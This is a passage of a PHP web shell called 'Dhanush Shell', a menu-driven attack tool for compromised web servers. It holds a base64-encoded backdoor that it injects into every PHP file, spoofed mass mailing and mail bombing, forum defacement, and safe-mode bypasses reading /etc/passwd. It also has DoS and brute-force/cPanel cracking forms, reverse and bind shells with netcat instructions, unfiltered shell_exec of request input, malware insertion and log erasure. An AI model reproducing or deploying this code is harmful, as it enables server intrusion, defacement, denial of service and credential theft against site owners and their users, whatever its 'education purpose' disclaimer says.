3110 <td style="width:80%;" align="left"><input name="from" class="box" value="Hello@abcd.in" onFocus="if(this.value == 'president@whitehouse.gov')this.value = '';" onBlur="if(this.value=='')this.value='president@whitehouse.gov';"/></td>
3111 </tr>
3112
3113 <tr>
3114 <td style="width:20%;">To</td>
3115 <td style="width:80%;"><input class="box" class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/></td>
3116 </tr>
3117
3118 <tr>
3119 <td style="width:20%;">Subject</td>
3120 <td style="width:80%;"><input type="text" class="box" name="subject" value="Dhanush Here!!" onFocus="if(this.value == 'Dhanush Here!!')this.value = '';" onBlur="if(this.value=='')this.value='Dhanush Here!!';" /></td>
3121 </tr>
3122
3123
3124 <tr>
3125 <td colspan="2">
3126 <textarea name="message" cols="110" rows="10" class="box">Hello !! This is Dhanush!!!</textarea>
3127 </td>
3128 </tr>
3129
3130
3131 <tr>
3132 <td rowspan="2">
3133 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="sendmail('massmailing',to.value,subject.value,message.value,from.value)" class="but" value=" Send! "/>
3134 </td>
3135 </tr>
3136 </table>
3137 </form></div>
3138 <?php
3139}
3140// Get Domains
3141else if(isset($_REQUEST["symlinkserver"]))
3142{
3143 ?>
3144 <center><table><tr>
3145 <td><a href=javascript:void(0) onClick="getdata('domains')"><font class=txt><b>| Get Domains |</b></font></a></td>
3146 <td><a href=javascript:void(0) onClick="getdata('symlink')"><font class=txt><b>| Symlink Server |</b></font></a></td>
3147 <td><a href=javascript:void(0) onClick="getdata('symlinkfile')"><font class=txt><b>| Symlink File |</b></font></a></td>
3148 <td><a href=javascript:void(0) onClick="getdata('script')"><font class=txt><b>| Script Locator |</b></font></a></td>
3149 </tr></table></center><br>
3150 <div id="showdata"></div><?php
3151}
3152// Forum Manager
3153else if(isset($_REQUEST["forum"]))
3154{ ?>
3155 <center><table><tr><td><a href=# onClick="getdata('defaceforum')"><font class=txt size="4">| Forum Defacer |</font></a></td>
3156 <td><a href=# onClick="getdata('passwordchange')"><font class=txt size="4">| Forum Password Changer |</font></a></td>
3157 </tr></table></center><br><div id="showdata"></div>
3158 <?php
3159}
3160// Sec info
3161else if(isset($_GET['secinfo']))
3162{ ?><div id=showdata></div>
3163<center><div id="showmydata"></div>
3164</center>
3165<br><center><font color =red size=5>Server security information</font><br><br></center>
3166 <table style="width:100%;border-color:#333333;" border="1">
3167 <tr>
3168 <td style="width:7%;">Curl</td>
3169 <td style="width:7%;">Oracle</td>
3170 <td style="width:7%;">MySQL</td>
3171 <td style="width:7%;">MSSQL</td>
3172 <td style="width:7%;">PostgreSQL</td>
3173 <td style="width:12%;">Open Base Directory</td>
3174 <td style="width:10%;">Safe_Exec_Dir</td>
3175 <td style="width:7%;">PHP Version</td>
3176 <td style="width:7%;">Magic Quotes</td>
3177 <td style="width:7%;">Server Admin</td>
3178 </tr>
3179 <tr>
3180 <td style="width:7%;"><font class="txt"><?php curlinfo(); ?></font></td>
3181 <td style="width:7%;"><font class="txt"><?php oracleinfo(); ?></font></td>
3182 <td style="width:7%;"><font class="txt"><?php mysqlinfo(); ?></font></td>
3183 <td style="width:7%;"><font class="txt"><?php mssqlinfo(); ?></font></td>
3184 <td style="width:7%;"><font class="txt"><?php postgresqlinfo(); ?></font></td>
3185 <td style="width:12%;"><font class="txt"><?php echo $basedir; ?></font></td>
3186 <td style="width:10%;"><font class="txt"><?php if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font >NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};} ?></font></td>
3187 <td style="width:7%;"><font class="txt"><?php phpver(); ?></font></td>
3188 <td style="width:7%;"><font class="txt"><?php magic_quote(); ?></font></td>
3189 <td style="width:7%;"><font class="txt"><?php serveradmin(); ?></font></td>
3190 </tr>
3191</table><br> <?php
3192 mysecinfo();
3193}
3194// Code Injector
3195
3196else if(isset($_GET['injector']))
3197{
3198 ?>
3199 <form method='POST'>
3200 <table id="margins">
3201 <tr>
3202 <td width="100" class="title">
3203 Directory
3204 </td>
3205 <td>
3206 <input class="box" name="pathtomass" value="<?php echo getcwd().$SEPARATOR; ?>" />
3207 </td>
3208
3209 </tr>
3210 <tr>
3211 <td class="title">
3212 Mode
3213 </td>
3214 <td>
3215 <select style="width: 400px;" name="mode" class="box">
3216 <option value="Apender">Apender</option>
3217 <option value="Overwriter">Overwriter</option>
3218 </select>
3219 </td>
3220 </tr>
3221 <tr>
3222 <td class="title">
3223 File Type
3224 </td>
3225 <td>
3226 <input type="text" class="box" name="filetype" value="php" onBlur="if(this.value=='')this.value='php';" />
3227 </td>
3228 </tr>
3229 <tr>
3230 <td>Create A backdoor by injecting this code in every php file of current directory</td>
3231 </tr>
3232
3233 <tr>
3234 <td colspan="2">
3235 <textarea name="injectthis" cols="110" rows="10" class="box"><?php echo base64_decode("PD9waHAgJGNtZCA9IDw8PEVPRA0KY21kDQpFT0Q7DQoNCmlmKGlzc2V0KCRfUkVRVUVTVFskY21kXSkpIHsNCnN5c3RlbSgkX1JFUVVFU1RbJGNtZF0pOyB9ID8+"); ?></textarea>
3236 </td>
3237 </tr>
3238 <tr>
3239 <td rowspan="2">
3240 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="codeinjector(pathtomass.value,mode.value,filetype.value,injectthis.value)" class="but" value="Inject "/>
3241 </td>
3242 </tr>
3243 </form>
3244 </table><div id="showinject"</div>
3245 <?php
3246}
3247// Bypass
3248else if(isset($_GET["bypass"]))
3249{
3250 ?><center><div id="showbyp"></div></center>
3251 <table cellpadding="7" align="center" border="3" style="width:70%;border-color:#333333;">
3252 <tr>
3253 <td align="center" colspan="2"><font color="#FF0000" size="3">Safe mode bypass</font></td>
3254 </tr>
3255 <tr>
3256 <td align="center">
3257 <p>Using copy() function</p>
3258 <form onSubmit="bypassfun('copy',copy.value);return false;">
3259 <input type="text" name="copy" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('copy',copy.value)" value="bypass" class="but">
3260 </form>
3261 </td>
3262 <td align="center">
3263 <p>Using imap() function</p>
3264 <form onSubmit="bypassfun('imap',imap.value);return false;">
3265 <input type="text" name="imap" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('imap',imap.value)" value="bypass" class="but">
3266 </form>
3267 </td>
3268 </tr>
3269
3270 <tr>
3271 <td align="center">
3272 <p>Using sql() function</p>
3273 <form onSubmit="bypassfun('sql',sql.value);return false;">
3274 <input type="text" name="sql" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('sql',sql.value)" value="bypass" class="but">
3275 </form>
3276 </td>
3277 <td align="center">
3278 <p>Using Curl() function</p>
3279 <form onSubmit="bypassfun('curl',curl.value);return false;">
3280 <input type="text" name="curl" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('curl',curl.value)" value="bypass" class="but">
3281 </form>
3282 </td>
3283 </tr>
3284
3285 <tr>
3286 <td align="center">
3287 <p>Bypass using include()</p>
3288 <form onSubmit="bypassfun('include',include.value);return false;">
3289 <input type="text" name="include" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('include',include.value)" value="bypass" class="but">
3290 </form>
3291 </td>
3292 <td align="center">
3293 <p>Using id() function</p>
3294 <form onSubmit="bypassfun('id',id.value);return false;">
3295 <input type="text" name="id" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('id',id.value)" value="bypass" class="but">
3296 </form>
3297 </td>
3298 </tr>
3299
3300 <tr>
3301 <td align="center">
3302 <p>Using tempnam() function</p>
3303 <form onSubmit="bypassfun('tempnam',tempname.value);return false;">
3304 <input type="text" name="tempname" value="../../../etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('tempnam',tempname.value)" value="bypass" class="but">
3305 </form>
3306 </td>
3307 <td align="center">
3308 <p>Using symlink() function</p>
3309 <form onSubmit="bypassfun('symlnk',sym.value);return false;">
3310 <input type="text" name="sym" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('symlnk',sym.value)" value="bypass" class="but">
3311 </form>
3312 </td>
3313 </tr>
3314 <tr>
3315 <td colspan=2 align="center">
3316 <p>Using Bypass function</p>
3317 <form onSubmit="bypassfun('newtype',newtype.value,optiontype.value);return false;">
3318 <input type="text" name="newtype" value="/etc/passwd" class="sbox">
3319 <select id="optiontype" class=sbox>
3320 <option value="tac">tac</option>
3321 <option value="more">more</option>
3322 <option value="less">less</option>
3323 <option value="rev">rev</option>
3324 <option value="xxd">xxd</option>
3325 </select>
3326 <input type="button" OnClick="bypassfun('newtype',newtype.value,optiontype.value)" value="bypass" class="but">
3327 </form>
3328 </td>
3329 </tr>
3330 </table>
3331 </form>
3332 <?php
3333}
3334//fuzzer
3335else if(isset($_GET['fuzz']))
3336{
3337 ?>
3338 <form method="GET">
3339 <table id="margins">
3340 <tr>
3341 <td width="400" class="title">
3342 IP
3343 </td>
3344 <td>
3345 <input class="box" name="myip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
3346 </td>
3347 </tr>
3348
3349 <tr>
3350 <td class="title">
3351 Port
3352 </td>
3353 <td>
3354 <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
3355 </td>
3356 </tr>
3357
3358 <tr>
3359 <td class="title">
3360 Timeout
3361 </td>
3362 <td>
3363 <input type="text" class="box" name="time" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';"/>
3364 </td>
3365 </tr>
3366
3367
3368 <tr>
3369 <td class="title">
3370 No of times
3371 </td>
3372 <td>
3373 <input type="text" class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';" />
3374 </td>
3375 </tr>
3376
3377 <tr>
3378 <td class="title">
3379 Message (The message Should be long and it will be multiplied with the value after it)
3380 </td>
3381 <td>
3382 <input class="box" name="message" value="%S%x--Some Garbage here --%x%S" onFocus="if(this.value == '%S%x--Some Garbage here --%x%S')this.value = '';" onBlur="if(this.value=='')this.value='%S%x--Some Garbage here --%x%S';"/>
3383 </td>
3384 <td>
3385 x
3386 </td>
3387 <td width="20">
3388 <input style="width: 30px;" class="box" name="messageMultiplier" value="10" />
3389 </td>
3390 </tr>
3391
3392 <tr>
3393 <td rowspan="2">
3394 <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="button" onClick="dos('fuzzer',myip.value,port.value,time.value,times.value,message.value,messageMultiplier.value)" class="but" value=" Submit "/>
3395 </td>
3396 </tr>
3397 </table>
3398 </form><div id="showdos"></div>
3399 <?php
3400}
3401// Zone-h Poster
3402 else if(isset($_GET["zone"]))
3403 {
3404 if(!function_exists('curl_version'))
3405 {
3406 echo "<pre style='margin-top:5px'><center><font >PHP CURL NOT EXIST</font></center></pre>";
3407 }
3408 ?>
3409 <center><font size="4" color="#FF0000">Zone-h Poster</font></center>
3410 <form action="<?php echo $self; ?>" method="post">
3411 <table align="center" cellpadding="5" border="0">
3412 <tr>
3413 <td>
3414 <input type="text" name="defacer" value="Attacker" class="box" /></td></tr>
3415 <tr><td>
3416 <select name="hackmode" class="box">
3417 <option >--------SELECT--------</option>
3418 <option value="1">known vulnerability (i.e. unpatched system)</option>
3419 <option value="2" >undisclosed (new) vulnerability</option>
3420 <option value="3" >configuration / admin. mistake</option>
3421 <option value="4" >brute force attack</option>
3422 <option value="5" >social engineering</option>
3423 <option value="6" >Web Server intrusion</option>
3424 <option value="7" >Web Server external module intrusion</option>
3425 <option value="8" >Mail Server intrusion</option>
3426 <option value="9" >FTP Server intrusion</option>
3427 <option value="10" >SSH Server intrusion</option>
3428 <option value="11" >Telnet Server intrusion</option>
3429 <option value="12" >RPC Server intrusion</option>
3430 <option value="13" >Shares misconfiguration</option>
3431 <option value="14" >Other Server intrusion</option>
3432 <option value="15" >SQL Injection</option>
3433 <option value="16" >URL Poisoning</option>
3434 <option value="17" >File Inclusion</option>
3435 <option value="18" >Other Web Application bug</option>
3436 <option value="19" >Remote administrative panel access bruteforcing</option>
3437 <option value="20" >Remote administrative panel access password guessing</option>
3438 <option value="21" >Remote administrative panel access social engineering</option>
3439 <option value="22" >Attack against administrator(password stealing/sniffing)</option>
3440 <option value="23" >Access credentials through Man In the Middle attack</option>
3441 <option value="24" >Remote service password guessing</option>
3442 <option value="25" >Remote service password bruteforce</option>
3443 <option value="26" >Rerouting after attacking the Firewall</option>
3444 <option value="27" >Rerouting after attacking the Router</option>
3445 <option value="28" >DNS attack through social engineering</option>
3446 <option value="29" >DNS attack through cache poisoning</option>
3447 <option value="30" >Not available</option>
3448 </select>
3449 </td></tr>
3450 <tr><td>
3451 <select name="reason" class="box">
3452 <option >--------SELECT--------</option>
3453 <option value="1" >Heh...just for fun!</option>
3454 <option value="2" >Revenge against that website</option>
3455 <option value="3" >Political reasons</option>
3456 <option value="4" >As a challenge</option>
3457 <option value="5" >I just want to be the best defacer</option>
3458 <option value="6" >Patriotism</option>
3459 <option value="7" >Not available</option>
3460 </select></td></tr>
3461 <tr><td>
3462 <textarea name="domain" class="box" cols="47" rows="9">List Of Domains</textarea></td></tr>
3463 <tr><td>
3464 <input type="button" onClick="zoneh(defacer.value,hackmode.value,reason.value,domain.value)" class="but" value="Send Now !" /></td></tr></table>
3465 </form><div id="showzone"></div>
3466 <?php }
3467//DDos
3468 else if(isset($_GET['dos']))
3469 {
3470 ?>
3471 <form method="GET">
3472 <table id="margins">
3473 <tr>
3474 <td width="400" class="title">
3475 IP
3476 </td>
3477 <td>
3478 <input class="box" name="myip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
3479 </td>
3480 </tr>
3481
3482 <tr>
3483 <td class="title">
3484 Port
3485 </td>
3486 <td>
3487 <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
3488 </td>
3489 </tr>
3490
3491 <tr>
3492 <td class="title">
3493 Timeout <font >(Time in seconds)</font>
3494 </td>
3495 <td>
3496 <input type="text" class="box" name="timeout" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';" />
3497 </td>
3498 </tr>
3499 <tr>
3500 <td class="title">
3501 Execution Time <font >(Time in seconds)</font>
3502 </td>
3503 <td>
3504 <input type="text" class="box" name="exTime" value="10" onFocus="if(this.value == '10')this.value = '';" onBlur="if(this.value=='')this.value='10';"/>
3505 </td>
3506 </tr>
3507 <tr>
3508 <td class="title">
3509 No of Bytes per/packet
3510 </td>
3511 <td>
3512 <input type="text" class="box" name="noOfBytes" value="999999" onFocus="if(this.value == '999999')this.value = '';" onBlur="if(this.value=='')this.value='999999';"/>
3513 </td>
3514 </tr>
3515 <tr>
3516 <td rowspan="2">
3517 <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="button" onClick="dos('dosser',myip.value,port.value,timeout.value,exTime.value,noOfBytes.value,'null')" class="but" value=" Attack >> "/>
3518 </td>
3519 </tr>
3520 </table>
3521 </form><div id="showdos"></div>
3522 <?php
3523}
3524else if(isset($_GET['mailbomb']))
3525{ ?>
3526 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('bomb')"><font class=txt size="4">| Mail Bomber |</font></a></td>
3527 <td><a href=javascript:void(0) onClick="getdata('mail')"><font class=txt size="4">| Mass Mailer |</font></a></td></tr></table></center><br><div id=showdata></div>
3528<?php
3529}
3530else if(isset($_GET['tools']))
3531 {
3532 ?>
3533 <center><br><form onSubmit="getport(host.value,protocol.value);return false;">
3534 <table cellpadding="5" border="3" style="border-color:#333333; width:50%;">
3535 <tr>
3536 <td colspan="2" align="center"><b><font size='4' color="#FF0000">Port Scanner<br></font></b></td>
3537 </tr>
3538 <tr>
3539 <td align="center">
3540 <input class="sbox" type='text' name='host' value='<?php echo $_SERVER["SERVER_ADDR"]; ?>' >
3541 </td>
3542 <td align="center">
3543 <select class="sbox" name='protocol'>
3544 <option value='tcp'>tcp</option>
3545 <option value='udp'>udp</option>
3546 </select>
3547 </td>
3548 <tr>
3549 <td colspan="2" align="center"><input class="but" type='button' onClick="getport(host.value,protocol.value)" value='Scan Ports'></td>
3550 </tr>
3551 </form>
3552 <tr><td colspan=2><div id="showports"></div>
3553 </td></tr></table>
3554
3555 <br>
3556 <form onSubmit="bruteforce(prototype.value,serverport.value,login.value,dict.value);return false;">
3557 <table cellpadding="5" border="2" style="border-color:#333333; width:50%;">
3558 <tr>
3559 <td colspan="2" align="center"><font size="4">BruteForce</font></td>
3560 </tr>
3561 <tr>
3562 <td>Type : </td>
3563 <td>
3564 <select name="prototype" class="sbox">
3565 <option value="ftp">FTP</option>
3566 <option value="mysql">MYSQL</option>
3567 <option value="postgresql">PostgreSql</option>
3568 </select>
3569 </td>
3570 </tr>
3571 <tr>
3572 <td>Server <b>:</b> Port : </td>
3573 <td><input type="text" name="serverport" value="<?php echo $_SERVER["SERVER_ADDR"]; ?>" class="sbox"></td>
3574 </tr>
3575 <tr>
3576 <td valign="middle">Brute type : </td>
3577 <td><label><input type=radio name=mytype value="1" checked> /etc/passwd</label><label><input type=checkbox id="reverse" name=reverse value=1 checked> reverse (login -> nigol)</label><hr color="#1B1B1B">
3578 <label><input type=radio name=mytype value="2"> Dictionary</label><br>
3579 Login : <input type="text" name="login" value="root" class="sbox"><br>
3580 Dictionary : <input type="text" name="dict" value="<?php echo getcwd() . $directorysperator; ?>passwd.txt" class="sbox">
3581 </td>
3582 </tr>
3583 <tr>
3584 <td colspan="2" align="center"><input type="button" onClick="bruteforce(prototype.value,serverport.value,login.value,dict.value)" value="Attack >>" class="but"></td>
3585 </tr>
3586 </form><tr><td colspan="2" id="showbrute"></td></tr>
3587 </table>
3588 </center><br>
3589 <?php
3590}
3591else if (isset($_GET["phpc"]))
3592{
3593 ?>
3594 <div id="showresult"></div>
3595 <form name="frm">
3596 <textarea name="code" class="box" cols="120" rows="10">phpinfo();</textarea>
3597 <br /><br />
3598 <input name="submit" value="Execute This COde! " class="but" onClick="execode(code.value)" type="button" />
3599 <label><input type="checkbox" id="intext" name="intext" value="disp"> <font class=txt size="3">Display in Textarea</font></label>
3600 </form>
3601 <?php
3602}
3603else if(isset($_GET["exploit"]))
3604{
3605 if(!isset($_GET["rootexploit"]))
3606 {
3607 ?>
3608 <center>
3609 <form action="<?php echo $self; ?>" method="get" target="_blank">
3610 <input type="hidden" name="exploit">
3611 <table border="1" cellpadding="5" cellspacing="4" style="width:50%;border-color:#333333;">
3612 <tr>
3613 <td style="height:60px;">
3614 <font size="4" class=txt>Select Website</font></td><td>
3615 <p><select id="rootexploit" name="rootexploit" class="box">
3616 <option value="exploit-db">Exploit-db</option>
3617 <option value="packetstormsecurity">Packetstormsecurity</option>
3618 <option value="exploitsearch">Exploitsearch</option>
3619 <option value="shodanhq">Shodanhq</option>
3620 </select></p></td></tr><tr><td colspan="2" align="center" style="height:40px;">
3621 <input type="submit" value="Search" class="but"></td></tr></table>
3622 </form></center><br>
3623
3624 <?php
3625 }
3626 else
3627 {
3628 //exploit search
3629 $Lversion = php_uname(r);
3630 $OSV = php_uname(s);
3631 if(eregi('Linux',$OSV))
3632 {
3633 $Lversion=substr($Lversion,0,6);
3634 if($_GET['rootexploit'] == "exploit-db")
3635 {
3636 header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=Linux+Kernel+$Lversion");
3637 }
3638 else if($_GET['rootexploit'] == "packetstormsecurity")
3639 {
3640 header("Location:http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=Linux+Kernel+$Lversion");
3641 }
3642 else if($_GET['rootexploit'] == "exploitsearch")
3643 {
3644 header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=Linux+Kernel+$Lversion");
3645 }
3646 else if($_GET['rootexploit'] == "shodanhq")
3647 {
3648 header("Location:http://www.shodanhq.com/exploits?q=Linux+Kernel+$Lversion");
3649 }
3650 }
3651 else
3652 {
3653 $Lversion=substr($Lversion,0,3);
3654 if($_GET['rootexploit'] == "exploit-db")
3655 {
3656 header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$OSV+Lversion");
3657 }
3658 else if($_GET['rootexploit'] == "packetstormsecurity")
3659 {
3660 header("Location:http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=$OSV+Lversion");
3661 }
3662 else if($_GET['rootexploit'] == "exploitsearch")
3663 {
3664 header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=$OSV+Lversion");
3665 }
3666 else if($_GET['rootexploit'] == "shodanhq")
3667 {
3668 header("Location:http://www.shodanhq.com/exploits?q=$OSV+Lversion");
3669 }
3670 }
3671 //End of Exploit search
3672 }
3673}
3674// Connect
3675else if(isset($_REQUEST['connect']))
3676{
3677 ?>
3678 <form action='<?php echo $self; ?>' method='POST' >
3679 <table style="width:50%" align="center" >
3680 <tr>
3681 <th colspan="1" width="50px">Reverse Shell</th>
3682 <th colspan="1" width="50px">Bind Shell</th>
3683 </tr>
3684 <tr>
3685 <td>
3686 <table style="border-spacing: 6px;">
3687 <tr>
3688 <td>IP </td>
3689 <td>
3690 <input type="text" class="box" style="width: 200px;" name="ip" value="<?php yourip();?>" />
3691 </td>
3692 </tr>
3693 <tr>
3694 <td>Port </td>
3695 <td><input style="width: 200px;" class="box" name="port" size='5' value="9891"/></td>
3696 </tr>
3697 <tr>
3698 <td style="vertical-align:top;">Use:</td>
3699 <td><select style="width: 95px;" name="lang" class="sbox">
3700 <option value="perl">Perl</option>
3701 <option value="python">Python</option>
3702 <option value="php">PHP</option>
3703 </select>
3704 <input type="submit" style="width: 90px;" class="but" value="Connect!" name="backconnect"/></td>
3705 </tr>
3706 </table> </form>
3707 </td>
3708
3709 <td style="vertical-align:top;">
3710 <form method='post' >
3711 <table style="border-spacing: 6px;">
3712 <tr>
3713 <td>Port</td>
3714 <td>
3715 <input style="width: 200px;" class="box" name="port" value="9891" />
3716 </td>
3717 </tr>
3718 <tr>
3719 <td>Password </td>
3720 <td>
3721 <input style="width: 200px;" class="box" name="passwd" value="Dhanush"/>
3722 </td>
3723 <tr>
3724 <td>Using</td>
3725 <td>
3726 <select style="width: 95px;" name="lang" id="lang" class="sbox">
3727 <option value="perl">Perl</option>
3728 <option value="c">C</option>
3729 </select>
3730 <input style="width: 90px;" class="but" type="submit" name="backdoor" value=" Bind "/></td>
3731 </tr>
3732 </table>
3733 </td>
3734 </form>
3735 </tr>
3736 <tr><td colspan=2><font color="#FF0000">Click "Connect" only after open port for it.Use NetCat, run "nc -l -n -v -p 9891"!<br>Click "Bind", use netcat and give it the command 'nc <?php yourip(); ?> 9891"!</font></td></tr>
3737 </table>
3738
3739 <?php
3740 }
3741
3742else if(isset($_REQUEST['404']))
3743{
3744 ?>
3745 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('404new')"><font class=txt size="4">| Set Your 404 Page |</font></a></td>
3746 <td><a href=javascript:void(0) onClick="getdata('404page')"><font class=txt size="4">| Set Specified 404 Page |</font></a></td>
3747 </tr></table></center><br>
3748 <div id="showdata"></div>
3749 <?php
3750}
3751else if(isset($_GET['about']))
3752 { ?>
3753 <center>
3754 <p><font size=6><u>D h a n u s h</u></font><br>
3755 <font size=5>[--==Coded By Arjun==--]</font>
3756 <div style='font-family: Courier New; font-size: 10px;'><font class=txt ><pre>
3757
3758 - -- -
3759 -- -- --
3760 -- --
3761 --- ---
3762 ------
3763 ----
3764 ----
3765 ------
3766-------
3767--- --
3768 -- ---
3769 -- -----
3770 --- --- ---
3771 --- --- ---
3772-- --------- --
3773-- ------- --
3774 -- ---- --
3775 -- --- --
3776 -- -- --
3777 --- --- -- ---
3778 ------ ------
3779 ---- ----
3780
3781
3782 </pre></font></div></center>
3783 <font class="txt">Dhanush Shell is a PHP Script, created for checking the vulnerability and security of any web server or website. With this PHP script, the owner can check various vulnerablities present in the web server. This shell provide you almost every facility that the security analyst need for penetration testing. This is a "All In One" php script, so that the user do not need to go anywhere else.<br> This script is coded by an Indian Ethical Hacker.<br> This script is only coded for education purpose or testing on your own server.The developer of the script is not responsible for any damage or misuse of it</font><br><br><center><font size=5>GREETZ To All Indian Hackers</font><br><font size=6>| जय महाकाल | | जय हिन्द |</font></center><br>
3784 <?php }
3785else if(isset($_GET['database']))
3786{ ?>
3787 <form onSubmit="mydatabase(server.value,username.value,password.value);return false;">
3788 <table id="datatable" style="width:90%;" cellpadding="4" align="center">
3789 <tr>
3790 <td colspan="2">Connect To Database</td>
3791 </tr>
3792 <tr>
3793 <td>Server Address :</td>
3794 <td><input type="text" class="box" name="server" value="localhost"></td>
3795 </tr>
3796 <tr>
3797 <td>Username :</td>
3798 <td><input type="text" class="box" name="username" value="root"></td>
3799 </tr>
3800 <tr>
3801 <td>Password:</td>
3802 <td><input type="text" class="box" name="password" value=""></td>
3803 </tr>
3804
3805 <tr>
3806 <td></td>
3807 <td><input type="button" onClick="mydatabase(server.value,username.value,password.value)" value=" Connect " name="executeit" class="but"></td>
3808 </tr>
3809 </table>
3810 </form>
3811 <div id="showsql"></div>
3812<?php
3813}
3814// Cpanel Cracker
3815 else if(isset($_REQUEST['cpanel']))
3816 {
3817 $cpanel_port="2082";
3818 $connect_timeout=5;
3819 ?>
3820 <center>
3821 <form method=post>
3822 <table style="width:50%;border-color:#333333;" border=1 cellpadding=4>
3823 <tr>
3824 <td align=center colspan=2>Target : <input type=text name="server" value="localhost" class=sbox></td>
3825 </tr>
3826 <tr>
3827 <td align=center>User names</td><td align=center>Password</td>
3828 </tr>
3829 <tr>
3830 <td align=center><textarea name=username rows=25 cols=22 class=box><?php
3831 if($os != "Windows")
3832 {
3833 if(@file('/etc/passwd'))
3834 {
3835 $users = file('/etc/passwd');
3836 foreach($users as $user)
3837 {
3838 $user = explode(':', $user);
3839 echo $user[0] . "\n";
3840 }
3841 }
3842 else
3843 {
3844 $temp = "";
3845 $val1 = 0;
3846 $val2 = 1000;
3847 for(;$val1 <= $val2;$val1++)
3848 {
3849 $uid = @posix_getpwuid($val1);
3850 if ($uid)
3851 $temp .= join(':',$uid)."\n";
3852 }
3853
3854 $temp = trim($temp);
3855
3856 if($file5 = fopen("test.txt","w"))
3857 {
3858 fputs($file5,$temp);
3859 fclose($file5);
3860
3861 $file = fopen("test.txt", "r");
3862 while(!feof($file))
3863 {
3864 $s = fgets($file);
3865 $matches = array();
3866 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
3867 $matches = str_replace("home/","",$matches[1]);
3868 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
3869 continue;
3870 echo $matches;
3871 }
3872 fclose($file);
3873 }
3874 }
3875 }
3876
3877 ?></textarea></td><td align=center><textarea name=password rows=25 cols=22 class=box></textarea></td>
3878 </tr>
3879 <tr>
3880 <td align=center colspan=2>Guess options : <label><input name="cracktype" type="radio" value="cpanel" checked> Cpanel(2082)</label><label><input name="cracktype" type="radio" value="ftp"> Ftp(21)</label><label><input name="cracktype" type="radio" value="telnet"> Telnet(23)</label></td>
3881 </tr>
3882 <tr>
3883 <td align=center colspan=2>Timeout delay : <input type="text" name="delay" value=5 class=sbox></td>
3884 </tr>
3885 <tr>
3886 <td align=center colspan=2><input type="submit" name="cpanelattack" value=" Go " class=but></td>
3887 </tr>
3888 </table>
3889 </form>
3890 </center>
3891 <?php
3892}
3893else if(isset($_REQUEST['malattack']))
3894{
3895 ?><input type="hidden" id="malpath" value="<?php echo $_GET["dir"]; ?>">
3896 <center><table><tr><td><a href=# onClick="getdata('malware')"><font class=txt size="4">| Malware Attack |</font></a></td>
3897 <td><a href=# onClick="getdata('codeinsert')"><font class=txt size="4">| Insert Own Code |</font></a></td></tr></table></center><br>
3898 <div id="showdata"></div>
3899 <?php
3900}
3901else if(isset($_GET["com"]))
3902{
3903 echo "<br>";
3904 ob_start();
3905 eval("phpinfo();");
3906 $b = ob_get_contents();
3907 ob_end_clean();
3908 $a = strpos($b,"<body>")+6; // yeah baby,, your body is wonderland ;-)
3909 $z = strpos($b,"</body>");
3910 $s_result = "<div class='myphp'>".substr($b,$a,$z-$a)."</div>";
3911 echo $s_result;
3912}
3913else if(isset($_GET['execute']))
3914{
3915 $comm = $_GET['execute'];
3916 chdir($_GET['executepath']);
3917 $check = shell_exec($comm);
3918
3919 echo "<center><textarea id=showexecute cols=120 rows=20 class=box>" . $check . "</textarea></center>";
3920
3921 ?>
3922 <BR><BR><center><form onSubmit="executemyfn('<?php echo addslashes($_GET['executepath']); ?>',execute.value);return false;">
3923 <input type="text" class="box" name="execute">
3924 <input type="button" onClick="executemyfn('<?php echo addslashes($_GET['executepath']); ?>',execute.value)" value="Execute" class="but"></form></center>
3925 <?php
3926}
3927else if(isset($_GET['mycmd']))
3928{
3929 if($_GET['mycmd']=="logeraser")
3930 {
